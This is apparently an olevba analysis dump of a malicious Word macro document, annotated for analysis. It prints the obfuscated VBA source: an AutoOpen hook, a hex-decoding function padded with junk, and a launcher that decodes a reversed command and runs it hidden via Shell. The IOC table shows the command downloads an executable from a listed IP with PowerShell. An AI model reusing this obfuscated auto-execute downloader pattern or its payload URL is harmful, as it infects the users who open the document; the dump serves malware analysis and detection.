- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- XML:MASIH-- 11idj325.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: 11idj325.doc
- Type: Word2003_XML
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: editdata.mso - OLE stream: u'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub autoopen()
- ' Auto-exec entry point: Word runs AutoOpen as soon as the document is opened
- ' (see the ANALYSIS table below). Its only statement is a call to the Sub of
- ' the same name defined in the last module of this dump, which decodes the
- ' embedded command line and launches it.
- ÐÎïøÏÃØÀÏÃØâûà
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO ываыААвыа.bas
- in file: editdata.mso - OLE stream: u'VBA/\u044b\u0432\u0430\u044b\u0410\u0410\u0432\u044b\u0430'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ' Module-level declarations. None of these 24 names is referenced anywhere in
- ' the code shown; they look like filler that pads the module (inference from
- ' the visible code only).
- Dim AxygGoRiTOkuqRQaIahCglVBhig86 As Integer
- Dim FWdUfyGGTWdgWNsQRofoGrsRaht53 As String
- Dim wpimAVKbJvgEKauDoRaItiZPmpJ71 As Boolean
- Dim krptyASMRGdXptpQpfAbOADHKLl37 As Double
- Dim mcxcyBVDWKBtCDxcMehDZOMLHdw35 As Byte
- Dim DfANDuTzoOLJgtnkAorYuhycBLh99 As Long
- Dim MYRulblLodGLYHRflePvqhJHhaa46 As Currency
- Dim YOjzcfRRuAoNTijUYngLCKOHXOo29 As Single
- Dim UsSXXrkKuQMefbwdYSCyKWoczNp12 As Integer
- Dim oawaFertGZiAGCtnnawpJqRYMpw65 As String
- Dim GcUASXZrTtVjZkjjRlCwPuQquYy45 As Boolean
- Dim ehWjDoUlowIphYRzymKOrWknVvk71 As Double
- Dim tHbwbUfnrcpLLIiZhowOAWgzGlk97 As Byte
- Dim GRGeZctPigHtTqvocYRVXWWHkiW63 As Long
- Dim WtoXLJgHDJAIFgKMFvBREDxYnKE49 As Currency
- Dim PPVTHAdPXpZsgnUWZedQTSJqZLL25 As Single
- Dim qkbMHYZqOLIZHdmyojeOVPXlxXw86 As Integer
- Dim kbRlINXrSUDZYsvpZoIJfjEhIeL41 As String
- Dim OICjFilTZsfJkIKPufsipoOFGdB36 As Boolean
- Dim gccpseUHWEPovokuiUEJlhPsNdL63 As Double
- Dim aQoQtHfbJUXkNdelKuoWMsTUQWg28 As Byte
- Dim jKLDiaSjgwltBjDHbovgTZcoYYr86 As Long
- Dim itmeYPMBWNFuycgqjDXBhjVMOro92 As Currency
- Dim EeRuEFbncgUdMsbrRWhpIYTdezO45 As Single
- Public Function ÈÎèîðÌÎËûâ(ByVal PDZOFTeMMzmMjw As String) As String
- ' Hex decoder used by the launcher Sub in the next module: takes a string made
- ' of two-character hex pairs and returns the string of the corresponding byte
- ' values. An empty input yields an empty string (the decoding loop never runs).
- ' Note: "Dim a, b As Integer" types only b; a is a Variant.
- Dim YkhbmjHCwjGfDADLJCDjxAzOCAK34, IiJADFAaDZrNiUgiPfKlZRRjwVS68 As Integer
- IiJADFAaDZrNiUgiPfKlZRRjwVS68 = 2164
- ' Three counting loops whose running totals are never read again; DoEvents on
- ' every iteration yields to the message loop. This reads as padding/delay meant
- ' to complicate analysis rather than anything functional (inference).
- For YkhbmjHCwjGfDADLJCDjxAzOCAK34 = 0 To 35
- IiJADFAaDZrNiUgiPfKlZRRjwVS68 = IiJADFAaDZrNiUgiPfKlZRRjwVS68 + YkhbmjHCwjGfDADLJCDjxAzOCAK34
- DoEvents
- Next YkhbmjHCwjGfDADLJCDjxAzOCAK34
- Dim hYlCzZmShpxesNYFktdcasEAVty15, wxOFaXIGlXMIqoVdjbqthiQvFjI13 As Integer
- wxOFaXIGlXMIqoVdjbqthiQvFjI13 = 5447
- For hYlCzZmShpxesNYFktdcasEAVty15 = 0 To 36
- wxOFaXIGlXMIqoVdjbqthiQvFjI13 = wxOFaXIGlXMIqoVdjbqthiQvFjI13 + hYlCzZmShpxesNYFktdcasEAVty15
- DoEvents
- Next hYlCzZmShpxesNYFktdcasEAVty15
- Dim KIeMXoAYAtGBqiQgALSWLvhkjVw15, lZShIiVKOjBvaVmcUOQjDcfqSOf83 As Integer
- lZShIiVKOjBvaVmcUOQjDcfqSOf83 = 7486
- For KIeMXoAYAtGBqiQgALSWLvhkjVw15 = 0 To 17
- lZShIiVKOjBvaVmcUOQjDcfqSOf83 = lZShIiVKOjBvaVmcUOQjDcfqSOf83 + KIeMXoAYAtGBqiQgALSWLvhkjVw15
- DoEvents
- Next KIeMXoAYAtGBqiQgALSWLvhkjVw15
- ' Decoding loop: Chr$(38) & Chr$(72) is "&H", so Val("&H" & pair) parses each
- ' two-character slice as a hex byte and Chr$ turns it back into a character.
- ' Building "&H" from Chr$ calls is what olevba flags as the Chr obfuscation.
- ' GBfuNiAvl, rIvzZMKEQTqM and rnyBQmn are never declared (no Option Explicit is
- ' visible), so they are implicit Variants.
- For GBfuNiAvl = 1 To Len(PDZOFTeMMzmMjw) Step 2
- rIvzZMKEQTqM = Chr$(Val(Chr$(38) & Chr$(72) & Mid$(PDZOFTeMMzmMjw, GBfuNiAvl, 2)))
- rnyBQmn = rnyBQmn & rIvzZMKEQTqM
- Next GBfuNiAvl
- ' Return the accumulated decoded string.
- ÈÎèîðÌÎËûâ = rnyBQmn
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+---------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+---------+-----------------------------------------+
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- +------------+---------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO куеАапыва.bas
- in file: editdata.mso - OLE stream: u'VBA/\u043a\u0443\u0435\u0410\u0430\u043f\u044b\u0432\u0430'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub ÐÎïøÏÃØÀÏÃØâûà()
- ' Called from ThisDocument.autoopen. Builds the command line by reversing the
- ' embedded literal (StrReverse) and hex-decoding it with the function in the
- ' previous module, then launches it with Shell; window style 0 is vbHide, so
- ' nothing is shown to the user. The hex literal itself has been removed from
- ' this paste; the IOCs olevba decoded from it (download URL, IP address, and
- ' the powershell/CAB/EXE names) are listed in the ANALYSIS table below.
- ' From a detection standpoint the observable behaviour is the Word process
- ' spawning a child shell and the outbound request to the listed address.
- øÈÐîìðîûâàÀ = ÈÎèîðÌÎËûâ(StrReverse("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"))
- ãíÃÏÎûâàà = Shell(øÈÐîìðîûâàÀ, 0)
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------------+-----------------------------------------+
- | Suspicious | Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | StrReverse | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | IOC | http://176.31.28.244 | URL (obfuscation: StrReverse+Hex) |
- | | /smoozy/shake.exe',' | |
- | | %TEMP%\huiUGI8t8dsF. | |
- | | cab' | |
- | IOC | 176.31.28.244 | IPv4 address (obfuscation: |
- | | | StrReverse+Hex) |
- | IOC | powershell.exe | Executable file name (obfuscation: |
- | | | StrReverse+Hex) |
- | IOC | shake.exe | Executable file name (obfuscation: |
- | | | StrReverse+Hex) |
- | IOC | huiUGI8t8dsF.exe | Executable file name (obfuscation: |
- | | | StrReverse+Hex) |
- +------------+----------------------+-----------------------------------------+